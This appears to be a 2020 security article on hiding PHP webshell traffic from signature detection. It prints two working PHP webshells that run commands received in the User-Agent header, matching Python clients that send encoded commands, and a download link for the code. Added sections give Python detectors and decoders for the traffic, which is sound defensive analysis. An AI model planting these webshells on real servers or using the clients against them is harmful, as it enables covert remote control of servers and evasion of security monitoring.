PHP webshell traffic encoding analysis
Security appliances on the market today detect malicious traffic by signature with good accuracy, and the traffic of a conventional one-line trojan or of Caidao (China Chopper) has signatures that are far too obvious. Most hacking tools are already in the signature databases, so the attacker's techniques are easily matched and the attack chain is easily reconstructed.
PHP one-liner
A conventional one-line trojan transmits its parameters in plaintext, so it is easy to detect.
Simple encoding (base64)
A conventional webshell passes the payload as a POST parameter, which traffic-inspection devices pick up easily. As shown below, the command can instead be sent base64-encoded in the User-Agent header and executed on the server. Base64 is an encoding, not encryption: it hides the plaintext from a naive signature, but anyone who decodes the header recovers the command.
Webshell source:
```php
<?php
// Read the command from the User-Agent header
$dd = $_SERVER['HTTP_USER_AGENT'];
// Decode the base64 User-Agent value
$qq = base64_decode($dd);
// Execute the decoded command, collecting output lines in $out
$jjj = exec($qq, $out);
$ls = '';
for ($i = 0; $i < count($out); $i++) {
    $ls = $ls . $out[$i] . "\n";
}
// Encode the command output before returning it
echo base64_encode($ls);
?>
```
A simple Python client to go with it.
Client source:
```python
#!/usr/bin/python3
# -*- coding: UTF-8 -*-
import requests
import base64

headers = {
    "User-Agent": "adwd",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding": "gzip, deflate"
}
while True:
    str_1 = input("please input cmd:")
    str_1 = bytes(str_1, encoding="gbk")
    str_1 = base64.b64encode(str_1)
    # The base64 command travels in the User-Agent header
    headers['User-Agent'] = str(str_1, encoding="ascii")
    ls = requests.get(url="http://127.0.0.1/1.php", headers=headers)  # change the URL here
    ls_1 = ls.content
    # The webshell returns the output base64-encoded
    ls_1 = base64.b64decode(ls_1)
    ls_2 = str(ls_1, encoding="gbk")
    print(ls_2)
```
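The encoding above defeats a signature that expects a plaintext parameter, but base64 needs no key to reverse, so the check a defender wants is simply to decode the header and read it. The following detector is an added example written for this article, not the author's client or webshell: it treats a User-Agent that is a pure base64 run as a candidate, decodes it (UTF-8 first, then GBK, since the client above encodes with GBK) and flags shell-like words; the same decoder runs over a response body. The sample requests are constructed.

```python
"""Detector for base64-encoded commands carried in the User-Agent header.

Added example for this article: not the article's client or webshell code.
All sample requests are constructed for the demonstration.
"""
import base64
import binascii
import re

# A real browser User-Agent contains spaces, slashes and parentheses.
# A value made only of base64 alphabet characters (with optional padding)
# is what the simple client above sends.
B64_RUN = re.compile(r"^[A-Za-z0-9+/]{4,}={0,2}$")

# Command words that commonly appear in shell traffic; word-bounded so that
# "id" does not match inside "video".
SHELL_WORDS = re.compile(
    r"\b(whoami|id|uname|cat|ls|dir|ipconfig|ifconfig|netstat|net\s+user|"
    r"cmd(?:\.exe)?|powershell|sh|bash)\b",
    re.IGNORECASE,
)


def decode_b64_text(value):
    """Return the decoded text if value is a clean base64 run, else None.

    The client on this page encodes with GBK, so GBK is tried after UTF-8.
    """
    if not B64_RUN.match(value):
        return None
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None
    for enc in ("utf-8", "gbk"):
        try:
            return raw.decode(enc)
        except UnicodeDecodeError:
            continue
    return None


def inspect_request(headers):
    """Classify one request by its User-Agent header.

    Returns the decoded command (or None) and a boolean 'suspicious' that is
    True when the decoded text contains a shell-like word.
    """
    ua = headers.get("User-Agent", "")
    decoded = decode_b64_text(ua)
    suspicious = decoded is not None and SHELL_WORDS.search(decoded) is not None
    return {"decoded": decoded, "suspicious": suspicious}


def inspect_response(body):
    """Decode a response body that is a bare base64 run, else return None."""
    return decode_b64_text(body.strip())


if __name__ == "__main__":
    # Constructed samples: the simple client above sending "whoami",
    # and an ordinary browser request.
    samples = [
        {"User-Agent": "d2hvYW1p", "Accept-Encoding": "gzip, deflate"},
        {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) Firefox/78.0"},
    ]
    for s in samples:
        print(inspect_request(s))
    print(repr(inspect_response("cm9vdAo=")))
```

The word list is deliberately short; in practice the stronger signal is structural: a User-Agent that is a bare base64 run paired with a response body that is also a bare base64 run, regardless of what either decodes to.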
Obfuscated encoding
Idea: the client splits the base64 payload in two and embeds the halves inside a normal-looking User-Agent string, then sends the request. The webshell strips the carrier text from the User-Agent to recover the payload, executes it, and returns the output encoded with base64 plus an ASCII shift (+1 on every character code). Both transforms are fixed and keyless, so anyone holding the webshell source can decode captured traffic in both directions; the aim is to defeat signature matching, not to provide confidentiality.
Webshell source:
```php
<?php
$dd = $_SERVER['HTTP_USER_AGENT'];
// Extract the payload: remove the three carrier fragments, which leaves
// the two base64 halves joined back together
$dd = str_replace("Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_ Version/5.1 Safari/534.50", "", $dd);
$dd = str_replace("6_8; en-us) AppleWebKit/53", "", $dd);
$dd = str_replace("4.50 (KHTML, like Gecko)", "", $dd);
$qq = base64_decode($dd);
$jjj = exec($qq, $out);
$ls = '';
for ($i = 0; $i < count($out); $i++) {
    $ls = $ls . $out[$i] . "\n";
}
// ASCII shift: add 1 to the code of every character
function xxx($string_1)
{
    $ls_1 = '';
    for ($j = 0; $j < strlen($string_1); $j++) {
        $ls_1 = $ls_1 . chr(ord($string_1[$j]) + 1);
    }
    return $ls_1;
}
$ls = base64_encode($ls); // base64 encode
$ls = xxx($ls);           // ASCII shift
echo $ls;
?>
```
Client source:
```python
#!/usr/bin/python3
# -*- coding: UTF-8 -*-
import requests
import base64


def divide(str3):  # split the base64 payload into two halves
    num = int(len(str3) / 2)
    num_1 = int(len(str3))
    str1 = str3[0:num]
    str2 = str3[num:num_1]
    return (str1, str2)


headers = {
    "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding": "gzip, deflate"
}
# Carrier fragments; the webshell strips exactly these three strings
user_agent_1 = "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_ Version/5.1 Safari/534.50"
user_agent_2 = "6_8; en-us) AppleWebKit/53"
user_agent_3 = "4.50 (KHTML, like Gecko)"


def xxx(string_1):  # undo the ASCII shift (subtract 1 from every character code)
    xxx_ls = ""
    for i in string_1:
        xxx_ls = xxx_ls + chr(ord(i) - 1)
    return (xxx_ls)


print("example:http://127.0.0.1/1.php")
url = input("Enter URL:")
while True:
    str_3 = input("please input cmd:")
    str_3 = bytes(str_3, encoding="gbk")
    str_3 = base64.b64encode(str_3)
    str_1, str_2 = divide(str_3)
    str_1 = str(str_1, encoding="gbk")
    str_2 = str(str_2, encoding="gbk")
    # Assemble the User-Agent: carrier + half 1 + carrier + half 2 + carrier
    headers['User-Agent'] = user_agent_1 + str_1 + user_agent_2 + str_2 + user_agent_3
    ls = requests.get(url=url, headers=headers)
    ls_1 = str(ls.content, encoding="gbk")
    ls_1 = xxx(ls_1)  # reverse the shift first, then base64-decode
    ls_1 = bytes(ls_1, encoding="gbk")
    ls_1 = base64.b64decode(ls_1)
    ls_2 = str(ls_1, encoding="gbk")
    print(ls_2)
```
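To see exactly what crosses the wire in the obfuscated variant, here is the scheme reimplemented in plain Python as an added example for this article, not the author's client or webshell: wrap_command builds the User-Agent the client sends, extract_command mirrors the three str_replace calls in the PHP, and encode_reply/decode_reply mirror base64 plus the +1 ASCII shift. The carrier fragments are the ones on this page; the command and output in the usage section are constructed. try_decode_reply is the defender's side: because the shift is fixed and keyless, a captured response decodes with no more information than the webshell source itself.

```python
"""Codec for the split-User-Agent payload and the base64 + ASCII-shift reply.

Added example for this article; it is not the author's client or webshell.
The three carrier fragments are the ones the article's client and webshell
use; the command and output in the usage section are constructed.
"""
import base64
import binascii

# Carrier fragments: the client interleaves the base64 halves between them,
# the webshell removes them with str_replace.
UA_1 = "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_ Version/5.1 Safari/534.50"
UA_2 = "6_8; en-us) AppleWebKit/53"
UA_3 = "4.50 (KHTML, like Gecko)"


def wrap_command(cmd, encoding="utf-8"):
    """Client side: base64 the command, split it in half, pad with carrier text."""
    b64 = base64.b64encode(cmd.encode(encoding)).decode("ascii")
    half = len(b64) // 2
    return UA_1 + b64[:half] + UA_2 + b64[half:] + UA_3


def extract_command(user_agent, encoding="utf-8"):
    """Server side, mirroring the three str_replace calls in the PHP webshell."""
    b64 = user_agent
    for fragment in (UA_1, UA_2, UA_3):
        b64 = b64.replace(fragment, "")
    return base64.b64decode(b64).decode(encoding)


def shift(text, delta):
    """Add delta to every character code (the PHP xxx() uses delta = +1)."""
    return "".join(chr(ord(c) + delta) for c in text)


def encode_reply(output, encoding="utf-8"):
    """Webshell side: base64, then +1 ASCII shift."""
    return shift(base64.b64encode(output.encode(encoding)).decode("ascii"), 1)


def decode_reply(body, encoding="utf-8"):
    """Client side: -1 shift, then base64 decode."""
    return base64.b64decode(shift(body, -1)).decode(encoding)


def try_decode_reply(body, encoding="utf-8"):
    """Defender side: attempt the same decoding on any captured body.

    The transform has no key, so a body either decodes or it does not; a
    non-None result on the response to a request whose User-Agent carried
    the fragments above is a strong indicator.
    """
    try:
        return base64.b64decode(shift(body, -1), validate=True).decode(encoding)
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None


if __name__ == "__main__":
    ua = wrap_command("whoami")          # constructed command
    print(ua)
    print(extract_command(ua))
    body = encode_reply("root\n")        # constructed command output
    print(body)
    print(repr(try_decode_reply(body)))
```

Two things stand out when the assembled User-Agent is printed. The fragment order does not reproduce the real Safari string the client starts with ("Version/5.1 Safari/534.50" ends up before the OS version and the base64 text), so a comparison against a list of known User-Agent values still flags it. And the shifted reply uses the base64 alphabet moved up by one, so characters such as "[", "{", ":", "," and ">" that never occur in base64 appear in an otherwise base64-shaped body, which is itself a usable signature.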
Source download:
https://github.com/1109450752/php_shell/blob/master/php%E6%B7%B7%E6%B7%86%E5%8A%A0%E5%AF%86webshell.zip
2020-7-14
YLL